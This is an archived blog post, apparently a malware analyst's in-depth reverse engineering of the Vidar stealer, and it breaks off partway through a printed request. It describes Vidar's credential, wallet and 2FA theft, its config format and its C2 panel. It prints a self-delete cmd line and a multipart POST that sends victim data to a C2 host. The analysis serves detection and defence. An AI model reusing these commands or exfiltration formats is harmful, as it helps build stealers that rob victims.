{
	"id": "477fec8c-a94d-497c-8ec8-f746cde49d85",
	"created_at": "2026-04-06T00:16:09.428645Z",
	"updated_at": "2026-04-10T03:36:48.119313Z",
	"deleted_at": null,
	"sha1_hash": "e31b1c0e40564c90b26bfdbcab36d5abf32b9a7c",
	"title": "Let’s dig into Vidar – An Arkei Copycat/Forked Stealer (In-depth analysis)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6490466,
	"plain_text": "Let’s dig into Vidar – An Arkei Copycat/Forked Stealer (In-depth\r\nanalysis)\r\nPublished: 2018-12-24 · Archived: 2026-04-05 20:23:47 UTC\r\nSometimes when you are reading tons and tons of log of malware analysis, you are not expecting that some little changes\r\ncould be in fact impactful.\r\nI paid the price when I was analyzing a supposed Arkei malware. my Yara rule at that time was supposed to trigger this\r\nmalware, but after some reversing, I realized that I was confronted with something different. Some strings linked to Arkei\r\nsignature was deleted and a new one appeared with the string “Vidar”, there are also some other tweaks in the in-depth\r\nanalysis that proves there are some differences (but small), but all the rest was totally identical to Arkei.\r\nThe malware is written in C++, seems to have started activities at the beginning of October 2018 and have all the kind of\r\nclassic features of stealers:\r\nSearching for specific documents\r\nStealing ID from cookie browsers\r\nStealing browser histories (also from tor browser)\r\nStealing wallets\r\nStealing data from 2FA software\r\nGrabbing message from messenger software\r\nScreenshot\r\nLoader settings\r\nTelegram notifications (on server-side)\r\nGet a complete snapshot of all information of the computer victim\r\nSold with a range of 250-700$, this stealer on shop/forums and when people buy it, they have access to a C2 Shop portal\r\nwhere they are able to generate their own payloads. So there is no management on their side. Also, domains who leads to the\r\nC2/Shop are changed every 4 days.\r\nFor this in-depth analysis, I will inspect the 4.1 version of Vidar, take an overview of the admin panel, catching the\r\ndifferences with Arkei.\r\nBasic Countries by-passing\r\nSo first of all, we have some classic pattern to quit the program if the victim machines are configured in some language with\r\nthe help of GetUserDefaultLocaleName. This is one of the easy tricks to check if the malware is not infected users from\r\nspecific countries.\r\nAs explained in the MSDN, A “locale” is a collection of language-related user preference information represented as a list of\r\nvalues, the stealer will check if the language is corresponding with the list of countries that mentioned below.\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 1 of 36\n\nWith a few seconds of searching on google, it’s easy to understand which countries are behind the locale names :\r\nLocale Country\r\nru-RU Russia\r\nbe-BY Belarus\r\nuz-UZ Uzbekistan\r\nkk-KZ Kazhakstan\r\naz-AZ Azerbaijan\r\nLCID Structure – https://msdn.microsoft.com/en-us/library/cc233968.aspx\r\nLanguage Code Table – http://www.lingoes.net/en/translator/langcode.htm\r\nLocaleName – https://docs.microsoft.com/fr-fr/windows/desktop/Intl/locale-names\r\nLocale – https://docs.microsoft.com/fr-fr/windows/desktop/Intl/locales-and-languages\r\nMutex generation\r\nThe mutant string generated by Vidar is unique for each victim, but simple to understand how it is generated. This is just a\r\nconcatenation of two strings :\r\nHardware Profile ID\r\nGetCurrentHwProfileA is used to retrieve the current hardware profile of the computer with the value of szHwProfileGuid.\r\nIf it fails, it will return “Unknown” here.\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 2 of 36\n\nThe Machine GUID\r\nWith the help of RegOpenKeyExA, the value of the registry key  is fetched:\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid\r\nThis is the UUID created by Windows during the installation of the operating system.\r\nWhen it’s done, the mutex is created, just like this :\r\nString setup\r\nWhen Vidar is entering in the main function, it needs to store some required strings to be able to work properly for some\r\nfurther steps.\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 3 of 36\n\nAll the RVA address of each string are stored in the .data section. The malware will go there to access to the requested\r\nstring.\r\nThis is a trick to slow down the static analysis of the malware, but this is really easy to surpass 🙂\r\nC2 Domain \u0026 Profile ID\r\nWhen the malware is generated by the builder on the customer area. A unique ID is hardcoded into it. When Vidar will\r\nrequest this value on the malicious domain, it will retrieve the corresponding profile that the threat actor wants to grab/steal\r\ninto the victim machine.\r\nSo on this case, this the profile ID is “178”. If there is no config on the malware, the profile ID “1” is hardcoded into it.\r\nThe C2 domain is a simple XORed string, the key is directly put into the XOR function to decrypt the data.\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 4 of 36\n\nAnd decrypted it’s in fact “newagenias.com”\r\nConfigs are possible to be extracted easily with the script izanami.py on my GitHub repository.\r\nHow to understand the config format\r\nFor example, this is default configuration the malware could get from the C2 :\r\n1,1,1,1,1,1,1,1,1,1,250,Default;%DESKTOP%\\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth*.*:*google*.*:*utc*.*:*UTC*.\r\nEach part have the “;” in delimiter, so let’s dig into it\r\nFirst part\r\n1 Saved password\r\n1 Cookies / AutoFill\r\n1 Wallet\r\n1 Internet History\r\n1 ??? –  Supposed to be Skype (not implemented)\r\n1 ??? – Supposed to be Steam (not implemented)\r\n1 Telegram\r\n1 Screenshot\r\n1 Grabber\r\n1 ???\r\n250 Max Size (kb)\r\nDefault Name of the profile (also used for archive file into the files repository)\r\nSecond part\r\n%DESKTOP %\r\nSelected folder repository where the grabber feature will\r\nsearch recursively (or not) some selected data\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 5 of 36\n\nThird part\r\n*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth*.*:*google*.*:*utc*.*:*UTC*.*:*crypt*.*:*key*.*\r\nFourth part\r\n50 Max Size per file (kb)\r\ntrue Collect Recursively\r\nFifth part:\r\nmovies:music:mp3;\r\nThis is the exception part, the grabber will avoid those strings if it matches in the files searched recursively in the specific\r\nwanted folder.\r\nThe setup is quite a mess if we are looking into the code. each option is stored into a byte or dword variable.\r\nFolder generation\r\nTo summarize all kind of possibles files/folders that will be generated for the malicious repository is in fact pretty simple :\r\n\\\\files \u003c- Master folder\r\n\\\\files\\\\Autofill \u003c- Auto-Fill files\r\n\\\\files\\\\CC \u003c- Credit Cards\r\n\\\\files\\\\Cookies \u003c- Cookies\r\n\\\\files\\\\Downloads \u003c- Downloaded data history from browsers\r\n\\\\files\\\\Files \u003c- Profile configs (Archives)\r\n\\\\files\\\\History \u003c- Browser histories\r\n\\\\files\\\\Soft \u003c- Master folder for targeted softwares\r\n\\\\files\\\\Soft\\\\Authy \u003c- 2FA software\r\n\\\\files\\\\Telegram \u003c- Telegram messages\r\n\\\\files\\\\Wallets \u003c- Cryptomining Wallets\r\nGeneralist files\r\n\\\\files\\screenshot.jpg \u003c- Actual screenshot of the screen\r\n\\\\files\\passwords.txt \u003c- Passwords consolidated all at once\r\n\\\\files\\\\information.txt \u003c- Snapshot of the computer setup\r\nLibraries necessary to grab some data\r\nSomething that I love when I read some malware specs, it’s when they said that the product could be launched without the\r\nnecessity to have some runtime libraries or other required software on the machine. But when you dig into the code or just\r\nwatching some network flow, you can see that the malware is downloading some DLL to be able to do some tasks.\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 6 of 36\n\nAnd for this case, they are required during the stealing process of different kind of browsers.\r\nfreebl3.dll Freebl Library for the NSS (Mozilla Browser)\r\nmozglue.dll Mozilla Browser Library\r\nmsvcp140.dll Visual C++ Runtime 2015\r\nnss3.dll\r\nNetwork System Services Library (Mozilla\r\nBrowser)\r\nsoftokn3.dll Mozilla Browser Library\r\nvcruntime140.dll Visual C++ Runtime 2015\r\nThey are deleted when the task is done.\r\nFTP\r\nList of supported software\r\nFileZilla\r\nWinSCP\r\n2FA software\r\nSomething that I found interesting on this malware is that also 2FA software is also targeted, a feature that I considered not\r\nseen really in the wild, and pretty sure this will be more and more common in the future. With the multiplication of those\r\nkinds of protection. Victims must understand that 2FA is not the ultimate way to protect accounts from hackers, this could be\r\nalso another door for vulnerabilities 🙂\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 7 of 36\n\nSo with Vidar, the Authy software is targeted…\r\nMore specifically the SQLite file on the corresponding application on %APPDATA% repository. It looks like this is the\r\nsame operating where stealer wants to steal data with software like Discord or Chrome.\r\nSo guys, be careful with your 2FA software 🙂\r\nBrowsers\r\nSomething interesting to mention, this bad boy is also stealing Tor Browser stuff.\r\nList of supported Browsers\r\n360 Browser\r\nAmigo\r\nBlackHawk\r\nCent Browser\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 8 of 36\n\nChedot Browser\r\nChromium\r\nCocCoc\r\nComodo Dragon\r\nCyberfox\r\nElements Browser\r\nEpic Privacy\r\nGoogle Chrome\r\nIceCat\r\nInternet Explorer\r\nK-Meleon\r\nKometa\r\nMaxthon5\r\nMicrosoft Edge\r\nMozilla Firefox\r\nMustang Browser\r\nNichrome\r\nOpera\r\nOrbitum\r\nPale Moon\r\nQIP Surf\r\nQQ Browser\r\nSputnik\r\nSuhba Browser\r\nTor Browser\r\nTorch\r\nURAN\r\nVivaldi\r\nWaterfox\r\nOf course, this list could be more important than this if there are some browsers based on chromium repository.\r\nMessengers/Mailer\r\nI will not explain here, how it works, but the technique is the same that I’ve explained in my previous blog post. (Especially\r\nfor the Telegram part).\r\nBat!\r\nPidgin\r\nTelegram\r\nThunderbird\r\nWallets\r\nAnoncoin\r\nBBQCoin\r\nBitcoin\r\nDashCore\r\nDevCoin\r\nDigitalCoin\r\nElectron Cash\r\nElectrumLTC\r\nEthereum\r\nExodus\r\nFlorinCoin\r\nFrancoCoin\r\nJAXX\r\nLitecoin\r\nMultiDoge\r\nTerraCoin\r\nYACoin\r\nZcash\r\nOf course, this list could change if the customer added some additional files to search on specific areas on the victim\r\nmachine.\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 9 of 36\n\nGrabber\r\nThe grabber feature is by far, the most complicated feature of the malware and what he looks to be really different from\r\nArkei, in term of implementation.\r\nSo first of all, it will skip or not the grabber feature by checking in config file downloaded, if this is activated. Preparing the\r\nstrings for creating the folder path and when all is set func_grabber could be used.\r\nWhen inspecting the func_grabber, I was not prepared to have this :\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 10 of 36\n\nBy far, when I saw this, I was not really happy to reverse this. I mean, I know I was falling in some unexpected allocated\r\nmemory into my brain. I had all the magnificent stuff that all malware reverser love (or not at all) :\r\nWeird conditions come out the blue.\r\nCalling function that will call other functions like Russian wooden dolls\r\nAPI calls\r\netc…\r\nBut if we are watching these at a macro view, it’s, in fact, easier than it looks like. I will just show just one example.\r\nSo in the example below, if the string %APPDATA% is present in the config downloaded from the C2. it will enter into the\r\nfunction and will start a bunch of verifications. Until entering into the most important one called func_VidarSearchFile\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 11 of 36\n\nAfter the process will remain almost the same for each scenario.\r\nThis is at least, all the repositories available in the grabber feature :\r\n%ALL_DRIVES% (GetDriveTypeA Necessary)\r\n%APPDATA%\r\n%C%\r\n%D%\r\n%DESKTOP%\r\n%DOCUMENTS%\r\n%DRIVE_FIXED%\r\n%DRIVE_REMOVABLE%\r\n%LOCALAPPDATA%\r\n%USERPROFILE%\r\nScreenshot\r\nThe generation of the screenshot is easy to understand :\r\nFirst GdiplusStartup function is called to initialize the Windows GDI+\r\nThen an alternative to GetDeviceCaps is called for getting the height of the screen on the display monitor with the\r\nvalue SM_CYSCREEN (1) with GetSystemMetrics this will be the same thing with SM_CXSCREEN (0) for the\r\nwidth.\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 12 of 36\n\nNow, it needs a DC object for creating a compatible bitmap necessary to generate our image by selecting the\r\nwindows DC into the compatible memory DC and using a Bit Block API function to transfer the data. When all is\r\ndone, it will enter into func_GdipSaveImageToFile\r\nSo now its needed to collect the bits from the generated bitmap and copies them into a buffer that will generate the screen\r\ncapture file.\r\nInformation Log\r\nSo let’s dig into information.txt, to understand how this file is generated. I will mention only some parts of the creation,\r\nanother part will be just the corresponded API call, breakpoint on these API if you want to take your time to analyze all the\r\nstep easily.\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 13 of 36\n\nFirst, it indicates which version of Vidar is used.\r\nIf you don’t see a Vidar on the log file. It means that you have an early version of it.\r\nDate GetSystemTimeAsFileTime\r\nMachineID Explained Above\r\nGUID GetCurrentHwProfileA\r\nPath GetModuleFileNameExA\r\nWork Dir Hardcoded string + func_FolderNameGeneration\r\nGet the name of the operating system and platform is classic because this is, in fact, a concatenation of two things. First,\r\nwith RegOpenKeyExA, the value of this registry key is fetched:\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName\r\nSecondly, for knowing if Windows is 32 or 64-bit, it checks itself if is running on WOW64 with the help of\r\nIsWow64Process.\r\nComputer Name GetComputerNameA\r\nUser Name GetUserNameA\r\nFor the current screen resolution used, CreateDCA is called to create a device context for “Display” and requesting the\r\nWidth and Height of the Device with GetDeviceCaps.\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 14 of 36\n\nThis remains to this source code :\r\nHDC hDC = CreateDCA(\"DISPLAY\", NULL, NULL, NULL);\r\nint width = GetDeviceCaps(hDC, HORZRES); // HORZRES = 0x8\r\nint height = GetDeviceCaps(hDC, VERTRES); // VERTRES = 0x0A\r\nLet’s continue our in-depth analysis…\r\nDisplay Language GetUserDefaultLocaleName\r\nKeyboard Languages GetKeyboardLayoutList / GetLocaleInfoA\r\nLocal Time GetSystemTimeAsFileTime\r\nTimeZone TzSpecificLocalTimeToSystemTime\r\nHardware\r\n??? the process name, the value of the registry key  is fetched:\r\nHKEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\ProcessorNameString\r\nCPU Count GetSystemInfo.dwNumberOfProcessors\r\nRAM GlobalMemoryStatusEx\r\nVideoCard EnumDisplayDevicesW\r\nNetwork\r\nThe network part is quite easy, it’s a translation of data retrieves on ip-api.com/line/ and put into the log, at the\r\ncorresponding place.\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 15 of 36\n\nProcesses\r\nThere is quite soft stuff done to get a snapshot of all the processes at the time where the stealer is executed.\r\nBut in the end, this is not complicated at all to understand the different steps.\r\nRequest CreateToolhelp32Snapshot, to get the complete snapshot of all the processes executed, and read one per one\r\nin a loop all with Process32First\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 16 of 36\n\nAfter, checking if it’s a parent process or a child process, Vidar will grab two value of the PROCESSENTRY32 object :\r\nth32ProcessID: PID\r\nszExeFile: The name of the PE\r\nSoftware\r\nFor the list of all installed software, the value of this registry key is fetched:\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\r\nAnd these values are retrieves of each software.\r\nDisplayName\r\nDisplayVersion\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 17 of 36\n\nResults\r\nSo for example, if you want to see the results, let’s see into one sandbox analysis, the generated information.txt (this is a\r\nVidar 4.2 here)\r\nVidar Version: 4.2\r\nDate: Thu Dec 13 14:39:05 2018\r\nMachineID: 90059c37-1320-41a4-b58d-2b75a9850d2f\r\nGUID: {e29ac6c0-7037-11de-816d-806e6f6e6963}\r\nPath: C:\\Users\\admin\\AppData\\Local\\Temp\\toto.exe\r\nWork Dir: C:\\ProgramData\\LDGQ3MM434V3HGAR2ZUK\r\nWindows: Windows 7 Professional [x86]\r\nComputer Name: USER-PC\r\nUser Name: admin\r\nDisplay Resolution: 1280x720\r\nDisplay Language: en-US\r\nKeyboard Languages: English (United States)\r\nLocal Time: 13/12/2018 14:39:5\r\nTimeZone: UTC-0\r\n[Hardware]\r\nProcessor: Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz\r\nCPU Count: 4\r\nRAM: 3583 MB\r\nVideoCard: Standard VGA Graphics Adapter\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 18 of 36\n\n[Network]\r\nIP: 185.230.125.140\r\nCountry: Switzerland (CH)\r\nCity: Zurich (Zurich)\r\nZIP: 8010\r\nCoordinates: 47.3769,8.54169\r\nISP: M247 Ltd (M247 Ltd)\r\n[Processes]\r\n- System [4]\r\n---------- smss.exe [264]\r\n- csrss.exe [344]\r\n\u003c ... \u003e\r\n[Software]\r\nAdobe Flash Player 26 ActiveX [26.0.0.131]\r\nAdobe Flash Player 26 NPAPI [26.0.0.131]\r\nAdobe Flash Player 26 PPAPI [26.0.0.131]\r\n\u003c ... \u003e\r\nLoader\r\nThe task is rudimentary but enough to do the job :\r\nGenerating a random name for the downloaded payload\r\nDownload the payload\r\nExecute\r\nWhen the binary file is downloaded from the C2, it’s using CreateFileA with specific parameters :\r\nedi : The downloaded data from the C2\r\n80h : “The file does not have other attributes set. This attribute is valid only if used alone.”\r\n2 : This option will force the overwriting if the filename already exists.\r\nedi : ???\r\n1 : “Enables subsequent open operations on a file or device to request read access.”\r\nOtherwise, other processes cannot open the file or device if they request read access.”\r\n40000000h : Write access (GENERIC_WRITE)\r\nebp+lpFileName : The generated filename \r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 19 of 36\n\nWhen it’s done, it only needs to Write content into the files (WriteFile) and then close the corresponding handle\r\n(CloseHandle)\r\nSo now, the file is downloaded and saved into the disk, it only needs to be launched with ShellExecuteA. So don’t hesitate to\r\nbreakpoint this API function, for grabbing the payload before it’s too late for further analysis.\r\nKilling Part\r\nSo when all the task of the stealer is finally accomplished and cleaned, the stealer needs to erase itself. So first of all, it\r\nretrieves this own PID with the help of GetCurrentProcessId.\r\nWhen it’s done, it enters into “func_GetProcessIdName”, tries to open a handle on his own process with OpenProcess, if it\r\nfailed, it continues to check and in the end the most important task here is to call GetModuleBaseNameA, which it permits\r\nto retrieve the name of the process name with the help of the PID that was obtained before.\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 20 of 36\n\nSome strings that are hardcoded on .rdata section are called and saved for future purposes.\r\nWhen the request is finely crafted, Vidar is simply using ShellExecuteA to pop a command shell and executing the task, this\r\npermit to erase all trace of the interaction of the payload on the machine.\r\nSo if we want a quick overview of the executed command:\r\nC:\\Windows\\System32\\cmd.exe” /c taskkill /im vidar.exe /f \u0026 erase C:\\Users\\Pouet\\AppData\\Local\\Temp\\vidar.exe \u0026 exit\r\nLiterally:\r\nOffset File + db ‘/c taskkill /im’ + [GetModuleBaseNameA] + db ‘ /f \u0026 erase’  + [GetModuleFileNameExA +\r\nGetModuleBaseNameA]+  + db ‘ \u0026 exit’\r\nSending archive to the C2\r\nFolder generation\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 21 of 36\n\nCOUNTRY + “_” + Machine GUID + “.zip”\r\nin example :\r\nNG_d6836847-acf3-4cee-945d-10c9982b53d1.zip\r\nLast POST request\r\nDuring the generation of the POST request, the generated HTTP packet is tweaked to add some additional content that the\r\nC2 server will read and process data.\r\nEach name at the end of the string will be the corresponding field to be saved into the database. This at least, all the different\r\nContent-Disposition that will be added to the HTTP request.\r\nhwid Hardware ID\r\nos Operating System\r\nplatform 32 or 64 bits System\r\nprofile C2 Profile ID\r\nuser Name of the victim account\r\ncccount Number of Credit Cards stolen\r\nccount Number of Coins Stolen (CryptoWallet)\r\nfcount Number of files stolen\r\ntelegram Telegram 🙂\r\nver The version of the Vidar malware\r\nAlso, there is a little trick here that I found nice. Here, the answer to the POST request is in fact, containing the config for\r\nthe loader.\r\nIf there is nothing, the response is “ok”\r\nIf there is something, the specified url(s) are stored.\r\nIts the same thing used for the config and the network information.\r\nExample with a sandbox :\r\nThe POST request\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 22 of 36\n\nThe response of this POST request (select the tab)\r\nServer-Side\r\nBecause it’s easy to find some information about the stealer, no needs to dig hard to have some marketplace where Vidar is\r\nsold. So let’s see how it looks like by looking some classical commercial video (all the screenshot are collected from there),\r\nfor attracting some possible customers. This could be completely different at that time, but it’s what it was looking like at the\r\nbeginning of November.\r\nLogin\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 23 of 36\n\nDashboard\r\nThe panel is a classical fancy user-friendly interface, with all the basic information necessary for the customer to have a fast\r\nview how is goin’ his business.\r\nThe current version of the builder\r\nUntil when he is able to generate some payloads\r\nHow many victims\r\nThe current balance on his account to re-subscribe again\r\nLogs\r\nsomething to mention with the log part is that it’s possible to put some notes on each data.\r\nPasswords\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 24 of 36\n\nBuilder\r\nThe builder tab is also pretty interesting because we have the changelog information about the stealer and on the download\r\npart, the malware generated will not be packed and this is the same scenario with Arkei.\r\nCustomer/Threat actor must have to use his own crypter/packer software for his payload.\r\nSettings\r\nThe most important tab is obviously where it is possible to configure the payload, for grabbing some additional stuff on the\r\nmachine with the profiles. Activate or deactivate some features to filtering the stealer for really specific purposes.\r\nIt’s also important to notify, that it’s possible with Vidar to deploy multiple profiles at the same time. It means when the\r\npayload is infecting the victim machine, X archive for X profile is saved in “files” repository. The customer could be able to\r\nsort easily for malicious purposes after the grabbed data.\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 25 of 36\n\nWhen editing or creating a new rule, we have this prompt panel appearing and this is in relation with what explained above\r\nwith all possible path that the malware is able to search with the selected files.\r\nAfter checking a little, there is plenty of profiles on the C2. This is what we could found:\r\nDefault empty config:\r\n1,1,1,1,1,1,1,1,0,1,250,none;\r\nDefault initialized config:\r\n1,1,1,1,1,1,1,1,1,1,250,Default;%DESKTOP%\\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*au\r\nExamples of custom profiles:\r\n1,1,1,1,1,1,1,1,1,1,250,grabba;%DESKTOP%\\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*aut\r\n1,1,0,1,1,1,1,1,1,1,250,инфа;%DESKTOP%\\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth\r\n1,1,1,1,1,1,1,1,1,1,250,Первое;%DESKTOP%\\;*.txt:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*;50;true;m\r\n1,1,1,1,1,1,1,1,1,1,250,123435566;%DESKTOP%\\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*\r\n1,1,1,1,1,1,1,1,1,1,250,Default;%DESKTOP%\\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*au\r\nThere are also some possibilities to see multiple profiles executed at the same time.\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 26 of 36\n\n1,1,1,1,1,1,0,1,1,1,250,\r\nDESKTOP;%DESKTOP%\\;*.txt:*.dat:*wallet*.*:*2fa*.*:*2fa*.png:*backup*.*:*code*.*:*password*.*:*auth*.*:*google*\r\nDOCUMENTS;%DOCUMENTS%\\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth*.*:*google*.*:*ut\r\nDRIVE_REMOVABLE;%DRIVE_REMOVABLE%\\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth*.*:*g\r\nthey are in fact Delimited with the specific format, as detailed as above. So here, we have 3 profiles :\r\nDESKTOP\r\nDOCUMENTS\r\nDRIVE_REMOVABLE\r\nthat will be stored into there respectively archives into “files” repository.\r\ne.d: All dumped profiles are available on my GitHub repository.\r\nFinally, with this quick analysis of the panel, something that is more and more common nowadays with a stealer, a loader\r\nfeature, for pushing other malware.\r\nAs mentioned in the introduction, this is a shop where customers will just have to deal to configure their malware,\r\neverything is managed by a team (?) behind for the maintenance and for avoiding proxy filtering stuff, domains are changed\r\nregularly (it’s also easy to check this on the samples, because it looks like a new version means a new generated domain).\r\nAlso, there is some possibility (of what they said) to have a 2FA Authentication to their account page.\r\nSome fancy message\r\nif we are searching for some stuff with the login panel, with have some sympathetic message.\r\nLet’s see what we have behind 🙂\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 27 of 36\n\nA kind of easter egg to remind us what is the signification of Vidar: “the God of Vengeance” in Nordic mythology.\r\nVidar – An Arkei copycat?\r\nIf we are looking to requests and code, Vidar is almost identical to Arkei. There is slightly some differences at some point\r\nbut all implemented features are the same. This could lose some blue team people if they don’t make too much attention to it\r\non sandbox results. Current Yara rules will trigger Vidar as Arkei, so automated assignations lead to mistakes at the moment\r\nof this review. Analyzing the code is mandatory here to understand what’s goin’ on.\r\nAt first, the main function for both of them is similar :\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 28 of 36\n\nThe archive generation is also the same, so this is not with this information that it’s possible to differentiate these two\r\nmalware.\r\nCode differences\r\nAn easy to know if we are dealing with Vidar is to find “Vidar.cpp”.\r\nVidar Signature\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 29 of 36\n\nArkei signature\r\nNetwork differences\r\nAn analyst can be dupe easily with the requests and thinking that we have another form of HTTP requests with Arkei, but\r\nit’s not.\r\nVidar HTTP Requests\r\n/ (i.e 162) \u003c- Config\r\nip-api.com/line/ \u003c- Get Network Info\r\n/msvcp140.dll \u003c- Required DLL\r\n/nss3.dll \u003c- Required DLL\r\n/softokn3.dll \u003c- Required DLL\r\n/vcruntime140.dll \u003c- Required DLL\r\n/ \u003c- Pushing Victim Archive to C2\r\nthere are no libraries downloaded on Arkei, this is something really specific to Vidar, for some parts of the stealing process.\r\nArkei HTTP Requests\r\n/index.php \u003c- Config\r\nip-api.com/line/ \u003c- Get Network Info\r\n/index.php \u003c- Pushing Victim Archive to C2\r\nConfig Format\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 30 of 36\n\nIf you want to understand what is the purpose the config format for Arkei\r\n1 Saved Passwords\r\n1 Cookies / Autofill\r\n1 History\r\n2 CryptoCurrency\r\n2 Skype\r\n2 Steam\r\n1 Telegram\r\n1 Screenshot\r\n1 Grabber\r\ntxt:log: Grabber Config\r\n50 Max Size (kb)\r\n2 Self Delete\r\nAlso, there are some slight changes in the last POST requests, Vidar is just adding new fields like the profile and the\r\nversioning.\r\nTo understand how far the requests looks the same, let’s dig into a PCAP file. I indicated the differences in red, and apart\r\nfrom the versioning and profile values, all rest is the same. But if we dig into some older sample, it’s impossible to see the\r\ndifferences except the path of the request.\r\nLast POST request – Vidar\r\nPOST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbi\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 66809\r\nHost: some.lovely.vidar.c2.with.love\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"hwid\"\r\n90059c37-1320-41a4-b58d-2b75a9850d2f\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"os\"\r\nWindows 7 Professional\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"platform\"\r\nx86\r\n--1BEF0A57BE110FD467A\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 31 of 36\n\nContent-Disposition: form-data; name=\"profile\"\r\nXXX \u003c- Random Int\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"user\"\r\nadmin\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"cccount\"\r\n0\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; 